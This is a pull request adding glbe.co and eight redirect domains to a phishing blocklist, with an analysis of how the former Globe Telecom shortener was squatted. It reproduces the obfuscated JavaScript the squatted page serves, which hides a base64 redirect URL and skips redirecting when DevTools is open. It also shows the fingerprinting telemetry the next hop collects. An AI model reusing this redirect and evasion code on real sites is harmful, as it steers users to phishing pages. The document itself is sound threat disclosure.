### PR TITLE
Block glbe.co and its redirected domains

### DIFF
--- a/additions/permanent/domains.list
+++ b/additions/permanent/domains.list
@@ -1,3 +1,12 @@
+glbe.co
+bulsis.net
+yapstermarline.top
+tkpopp.cfd
+yetansd.com
+directtooffer.com
+jblackard.com
+iryva.com
+dr-blanca-mhfscak.work
 0ffice365-1drvve-oneauthmx1drive.glitch.me
 1-67c.pages.dev
 109.197.125.34.bc.googleusercontent.com


### PR DESCRIPTION
## Phishing Domain/URL/IP(s):
| Domain                 | URL                                                                                                                                                                |
| :--------------------- | :----------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| glbe.co                | https://glbe.co/NewGlobeONE                                                                                                                                        |
| bulsis.net             | https://bulsis.net/go/2432160?ref=&subid1=&subid2=glbe.co                                                                                                          |
| yapstermarline.top     | https://www.yapstermarline.top/f/a870f353-c4cf-4b71-b34c-4d0091171a9e?click_id=GOmABzi1b2i251Bwo_T9AegBoLmUAYACu4Cgss33v9AD&zone_id=2432160                        |
| tkpopp.cfd             | https://tkpopp.cfd/track/click/z0IsnHZ8eS2At634_z (truncated)                                                                                                      |
| yetansd.com            | https://yetansd.com/tracking/click.gif?token=1ttexujumqkuynmy1uw0rtdot70xi&price=${AUCTION_PRICE}&rurl=https%3A%2F%2F4rapwaboost.in (truncated)                    |
| directtooffer.com      | https://directtooffer.com/cr38l3k.php?key=168b40bfb31fdac5f8a8&clickId=GOmABzjDgwFo6s1GcMuh3QHoAaC5lAGAAqSAoLKd_sfQAw&Cost=0.000100&zoneId=2432160 (truncated)     |
| jblackard.com          | https://jblackard.com/or/djex/ejbkqw?aff_click_id=d8qi80a9joec73avav2g&source_id=2432160                                                                           |
| iryva.com              | https://iryva.com/kzgr?ofv_id=1022&aff_pub_id=107263&click_id=cr261526693143904259&subid1=107263&subid2=2432160                                                    |
| dr-blanca-mhfscak.work | https://dr-blanca-mhfscak.work/?aff_pub_id=107263&click_id=cr261526693143904259&lsid=6cdcb54a-15ed-44b0-9606-bf2b95714e8a&ofv_id=1022&subid1=107263&subid2=2432160 |


## Impersonated domain
<!-- Required. Use Back ticks. -->
```
globe.com.ph
new.globe.com.ph
```

## Describe the issue
A previously valid and company registered domain `glbe.co` is now domain squatted by malicious actors and is used to redirect to various phishing, gambling, and affiliate sites.

### History of glbe.co domain
This domain was previously used by a Philippine telecommunications company (Globe) and was used as a URL shortener domain for critical links such as SIM registration `https://glbe.co/NewGlobeONE`.

Wayback Machine was able to archive between [August 10, 2021](https://web.archive.org/web/20210810140315/https://glbe.co/NewGlobeONE) to [April 7, 2025](https://web.archive.org/web/20250407141600/https://glbe.co/NewGlobeONE). The link redirects to another URL shortener `http://onelink.to/3ufngg` which redirects to the valid target URL `https://www.globe.com.ph/apps/globeone`

WHOIS data shows that as early as August 14, 2025 the domain was squatted by a new registrant using the registrar GrepApps Technology Inc `https://docky.ly`. Wayback Machine recorded that on [November 29, 2025](https://web.archive.org/web/20251129102449/https://glbe.co/NewGlobeONE) it is redirecting to `https://sidesteamroll.com/go/2161948`. In 2026, any link using the `glbe.co` domain will serve a webpage with an obfuscated JavaScript code that redirects the user to `https://bulsis.net/go/2432160?ref=&subid1=&subid2=glbe.co` which then redirects to various phishing, gambling, and affiliate sites.


Existing SIM cards are still being circulated with a QR code of `https://glbe.co/NewGlobeONE`

<img width="3056" height="3056" alt="2260" src="https://github.com/user-attachments/assets/abc174a4-030a-41a8-8917-0d54e296cbaf" />
<img width="3056" height="3056" alt="2259" src="https://github.com/user-attachments/assets/0c9e2ea4-8a4b-4b6f-a4c5-5ff201ef2796" />

### Behavior of the malicious glbe.co
Any link under `glbe.co` will serve the following webpage:

```html
<!-- 825924160599 -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="robots" content="noindex,noarchive,nofollow">
</head>
<body>
<div id="root"></div>
<script nonce="StO3C2GuLHkUuddXCQ+c8A==">
(function(){var _0x1a2b='aHR0cHM6Ly9idWxzaXMubmV0L2dvLzI0MzIxNjA/cmVmPSZzdWJpZDE9JnN1YmlkMj1nbGJlLmNv';(function(_0x2a8f){var _0x4e3d=['\x61\x74\x6f\x62','\x6c\x6f\x63\x61\x74\x69\x6f\x6e','\x72\x65\x70\x6c\x61\x63\x65','\x68\x72\x65\x66','\x61\x73\x73\x69\x67\x6e','\x6f\x75\x74\x65\x72\x57\x69\x64\x74\x68','\x69\x6e\x6e\x65\x72\x57\x69\x64\x74\x68','\x6f\x75\x74\x65\x72\x48\x65\x69\x67\x68\x74','\x69\x6e\x6e\x65\x72\x48\x65\x69\x67\x68\x74'],_0x1b7c=function(_0x5d2a){return _0x4e3d[_0x5d2a];},_0x3f9e=window[_0x1b7c(0x0)](_0x2a8f),_0x2c4b=0x0;if(window[_0x1b7c(0x5)]-window[_0x1b7c(0x6)]>0xa0||window[_0x1b7c(0x7)]-window[_0x1b7c(0x8)]>0xa0){return;}while(!![]){switch(_0x2c4b){case 0x0:try{window[_0x1b7c(0x1)][_0x1b7c(0x2)](_0x3f9e);}catch(_0x1a5f){}_0x2c4b=0x1;break;case 0x1:setTimeout(function(){window[_0x1b7c(0x1)][_0x1b7c(0x3)]=_0x3f9e;},0x64);_0x2c4b=0x2;break;case 0x2:setTimeout(function(){window[_0x1b7c(0x1)][_0x1b7c(0x4)](_0x3f9e);},0x1f4);_0x2c4b=0x3;break;case 0x3:return;case 0x4:var _0xdead=Math.random()*0x2710;if(_0xdead>0x4e20){window[_0x1b7c(0x1)][_0x1b7c(0x2)](_0x3f9e);}_0x2c4b=0x5;break;case 0x5:var _0xbeef=Date.now()%0x3e8;if(_0xbeef<-0x1){console.log(_0x1b7c(0x0));}_0x2c4b=0x6;break;}}})
(_0x1a2b);})();
</script>
</body>
</html>
```

The obfuscated code contains a base64 encoded URL `aHR0cHM6Ly9idWxzaXMubmV0L2dvLzI0MzIxNjA/cmVmPSZzdWJpZDE9JnN1YmlkMj1nbGJlLmNv` which decodes to `https://bulsis.net/go/2432160?ref=&subid1=&subid2=glbe.co`. The obfuscated code will not redirect if DevTools or Inspector is open.

### Behavior of bulsis.net

The redirected URL also contains an obfuscated code that captures telemetry data as a JSON string and encodes it as ROT13 before sending to bulsis.net.

<img width="591" height="720" alt="image" src="https://github.com/user-attachments/assets/47052f8e-d257-414b-bfcb-d1e54da6b2ba" />

The result of the above code is a JSON string like this:

```
{
  "ua": "Mozilla/5.0 (X11; Linux x86_64; rv:152.0) Gecko/20100101 Firefox/152.0",
  "lang": "en-US",
  "platform": "Linux x86_64",
  "domain": "bulsis.net",
  "tz": "XXX/XXX",
  "is_touch": false,
  "max_touch_points": 0,
  "is_wd": false,
  "is_njs": false,
  "is_pjs": false,
  "is_plwrght": false,
  "is_ifr": false,
  "s_spoofed": false,
  "e_len": 37,
  "chrome_prop": false,
  "is_chrome": false,
  "is_firefox": true,
  "is_safari": false,
  "wrong_chrome": false,
  "ifr_chrome": false,
  "plugins": 5,
  "webgl": "NVIDIA GeForce GTX 980, or similar",
  "hw_con": 8,
  "screen_width": 1920,
  "screen_height": 1080,
  "avail_screen_width": 1920,
  "avail_screen_height": 1080,
  "window_outer_width": 728,
  "window_outer_height": 1124,
  "window_inner_width": 374,
  "window_inner_height": 591,
  "perm_accelerometer": -1,
  "perm_bluetooth": -1,
  "perm_camera": 0,
  "perm_microphone": 0,
  "perm_notifications": 0,
  "perm_nfc": -1,
  "perm_gyroscope": -1,
  "perm_geolocation": 0,
  "perm_clipboard": -1,
  "perm_push": 0,
  "f_android": true,
  "f_linux": true,
  "f_windows": true,
  "f_et": 1,
  "mem": -1,
  "b_lvl": -1,
  "b_dcht": -1,
  "b_chst": false,
  "pos_x": -1,
  "pos_y": -1,
  "pos_z": -1,
  "mm": 0,
  "cl": 0,
  "tps": 0,
  "scrl": 0,
  "et": 124
}
```

The code also detects device OS, whether it is running under headless environment, battery status, fonts, etc. The following snippet shows its font detection script:

<img width="698" height="844" alt="image" src="https://github.com/user-attachments/assets/7d560c3d-30e6-4351-bb5d-64486548ee90" />

Once the data is captured and sent to bulsis.net, the response is a redirection to various random URL. A limited sample of these URLs captured during this analysis are included in the table of submitted domains.

## Related external source
<!-- If you have found your information in another fora, please paste link here. One link per line. -->
| Domain                 | PhishTank                                               |
| :--------------------- | :------------------------------------------------------ |
| glbe.co                | https://phishtank.org/phish_detail.php?phish_id=9457265 |
| bulsis.net             | https://phishtank.org/phish_detail.php?phish_id=9457267 |
| yapstermarline.top     | https://phishtank.org/phish_detail.php?phish_id=9457276 |
| tkpopp.cfd             | https://phishtank.org/phish_detail.php?phish_id=9457580 |
| yetansd.com            | https://phishtank.org/phish_detail.php?phish_id=9457581 |
| directtooffer.com      | https://phishtank.org/phish_detail.php?phish_id=9457596 |
| jblackard.com          | https://phishtank.org/phish_detail.php?phish_id=9457597 |
| iryva.com              | https://phishtank.org/phish_detail.php?phish_id=9457598 |
| dr-blanca-mhfscak.work | https://phishtank.org/phish_detail.php?phish_id=9457601 |